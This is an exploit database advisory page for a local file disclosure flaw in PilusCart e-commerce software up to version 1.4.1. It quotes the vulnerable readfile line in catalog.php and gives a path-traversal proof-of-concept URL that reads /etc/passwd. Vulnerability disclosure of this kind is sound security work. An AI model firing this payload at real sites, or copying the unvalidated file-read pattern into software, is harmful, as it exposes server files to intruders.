header-logo
Suggest Exploit
vendor:
PilusCart
by:
Damian Ebelties
7.5
CVSS
HIGH
Local File Disclosure
22
CWE
Product Name: PilusCart
Affected Version From: <= 1.4.1
Affected Version To: <= 1.4.1
Patch Exists: NO
Related CWE: N/A
CPE: a:pilus:piluscart
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 18.04.1
2019

PilusCart <= 1.4.1 - Local File Disclosure

The e-commerce software 'PilusCart' is not validating the 'filename' passed correctly, which leads to Local File Disclosure.

Mitigation:

Validate the 'filename' parameter correctly.
Source

Exploit-DB raw data:

# Exploit Title: PilusCart <= 1.4.1 - Local File Disclosure
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://sourceforge.net/projects/pilus/
# Version: <= 1.4.1
# Tested on: Ubuntu 18.04.1

The e-commerce software 'PilusCart' is not validating the 'filename' passed correctly,
which leads to Local File Disclosure.

As of today (29 August 2019) this issue is unfixed.

Vulnerable code: (catalog.php on line 71)

    readfile("$direktori$filename");

Proof-of-Concept:

    https://domain.tld/catalog.php?filename=../../../../../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR